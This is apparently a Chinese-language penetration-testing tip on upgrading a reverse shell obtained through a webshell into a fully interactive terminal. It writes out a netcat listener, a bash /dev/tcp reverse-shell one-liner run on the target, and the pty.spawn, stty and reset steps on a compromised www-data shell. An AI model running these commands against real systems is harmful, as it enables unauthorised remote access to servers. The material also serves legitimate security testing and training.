当Webshell反弹到服务器上时经常都是非交互式的,具体表现为无法使用控制符。在某些时候就就很难下一步操作了,比如需要使用vim,在Ctrl+C时却退出了Shell
升级Shell为完全交换式的小Tip:
查看监听服务器终端和STTY信息
1 2 3 4 5 6 7 8 9 10 11 12 root@localhost:~# echo $TERM xterm root@localhost:~# stty -a speed 38400 baud; rows 47; columns 160; line = 0; intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0; -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
这里我们的终端信息为xterm,stty的行数(rows)为47,列数(columns)为160
在监听服务器开启监听
1 2 root@localhost:~# nc -lvp 8077 Listening on 0.0.0.0 8077
在目标机器执行反弹shell命令
1 bash -i >& /dev/tcp/192.168.1.1/8077 0>&1
这里我们反弹的shell为bash,此时监听服务器收到了反弹的shell
1 2 3 4 5 6 root@HeyJW-machine:~# nc -lvp 8077 Listening on 0.0.0.0 8077 Connection received on 1.14.71.254 36490 bash: cannot set terminal process group (432): Inappropriate ioctl for device bash: no job control in this shell www-data@09010c0e86d04512:/var/www/html$
启用python交互式
1 2 www-data@09010c0e86d04512:/var/www/html$ python3 -c 'import pty; pty.spawn("/bin/bash")' <ml$ python3 -c 'import pty; pty.spawn("/bin/bash")'
按下Ctrl+Z,后台挂起
1 2 3 4 5 6 www-data@09010c0e86d04512:/var/www/html$ stty raw -echo stty raw -echo www-data@09010c0e86d04512:/var/www/html$ fg www-data@09010c0e86d04512:/var/www/html$ reset
可能这时候就会有如下的提示询问终端类型,此时就可以直接输入终端信息然后回车
1 2 reset: unknown terminal type unknown Terminal type?
若无提示需要设置
1 www-data@6aae652213e24b63:/var/www/html$ export TERM=xterm
根据自己的终端信息设置如下参数
1 2 $ export SHELL=bash $ stty rows 47 columns 160
